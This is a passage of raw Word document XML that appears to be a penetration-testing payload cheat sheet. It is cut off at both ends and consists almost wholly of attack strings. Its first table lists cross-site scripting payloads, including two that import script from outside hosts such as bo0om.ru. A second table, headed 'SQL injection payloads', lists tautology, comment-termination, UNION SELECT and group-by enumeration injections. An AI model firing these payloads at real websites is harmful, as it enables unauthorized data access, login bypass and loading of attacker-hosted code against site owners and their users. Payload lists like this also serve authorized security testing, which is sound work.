          <w:p w14:paraId="0406197C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"%3balert`1`%3b"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790C573A" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>asd"`&gt; onpointerenter=x=prompt,x`XSS`</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="697B3A36" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x onauxclick=import('//1152848220/')&gt;click</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37752A6B" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;img src onerror=import('//bo0om.ru/x/')&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="282F6769" w14:textId="24E92DEE" w:rsidR="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>';alert(1);'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="109ECDC6" w14:textId="4B20CF0E" w:rsidR="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44B4227A" w14:textId="36F7E15A" w:rsidR="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>SQL injection payloads</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C3F72" w14:paraId="337731B7" w14:textId="77777777" w:rsidTr="001C3F72">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B643E22" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>==</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FB05353" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>=</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A79811A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="025A964B" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68447889" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D10FF1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' –</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="605D57CE" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77FE7012" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="771E5481" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'#</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="619CBD57" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5518A2C6" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D295C8C" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"/*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26D03FCD" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' and 1='1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E2C6641" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' and a='a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="285B89BB" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 1=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ABF94A9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or true</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02B70D69" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or ''='</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="438A2BD8" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or ""="</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C0C7E0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>′</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>) and '1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>′</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>='1</w:t>
            </w:r>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CC0B504" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17ED2FB9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014C9AD0" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> and 1=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72DBBF6D" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> and 1=1–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="734BBCB2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' and 'one'='one</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B92E709" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' and 'one'='one–</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DB60D2E" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' group by password having 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C244713" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' group by userid having 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36C76192" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' group by username having 1=1--</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19F6E453" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> like '%'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA2062A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 0=0 --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75D35411" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 0=0 #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="474D1613" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 0=0 –</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7354A127" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or         0=0 #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10B75599" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 0=0 --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="645B8EF2" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 0=0 #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2787B4E1" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>' or 0=0 –</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C32E2D9" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 0=0 --</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="673560C4" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 0=0 #</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05CE396A" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>" or 0=0 –</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="537D54CC" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>%' or '0'='0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A2B0648" w14:textId="77777777" w:rsidR="001C3F72" w:rsidRPr="001C3F72" w:rsidRDefault="001C3F72" w:rsidP="001C3F72">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C3F72">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> or 1=1</w:t>
            </w:r>
          </w:p>
